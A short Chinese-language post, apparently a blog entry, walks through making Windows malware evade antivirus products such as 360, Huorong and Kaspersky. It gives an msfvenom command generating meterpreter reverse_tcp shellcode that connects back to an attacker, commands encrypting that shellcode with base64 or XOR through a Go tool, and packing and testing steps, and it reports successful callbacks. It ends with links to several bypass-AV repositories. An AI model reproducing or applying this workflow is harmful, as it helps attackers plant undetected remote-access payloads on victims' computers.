本来整合了几个项目,python+go的免杀基本上过所有主流杀软(自测的火绒、电脑管家、瑞星、360、卡巴斯基),但是因为刚下载的360没有取消勾选,样本被自动上传了,于是乎,第二天就被报毒了。
不得不说360的白嫖
是做的挺好
生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -f c
对shellcode
进行加密
go run main.go -i payload.bin -o .\1.txt -base64 -v
其实这里直接使用hex的结果就可以了,直接运行混编生成可执行文件
go run main.go
因为火绒不过的效果可能不好,加壳的效果
查看火绒查杀的效果
没有问题。
发现上线均无问题。
这里的话其实可以另外扩展思路。
go run main.go -i payload.bin -o .\2.txt -mode encrypt -type xor -key qwe -v
修改main.go
进行打包
火绒查杀报毒
但是做处理之后无毒
比如说自写的算法是可以实现免杀的。
起码工作还没结束,进程注入以及其他方式的免杀以及隐蔽性还需要考虑,另外还需要考虑什么语言去实现我们想要的效果。
https://github.com/TideSec/BypassAntiVirus
https://github.com/hack2fun/BypassAV
https://github.com/pureqh/bypassAV
https://github.com/M-Kings/BypassAv-web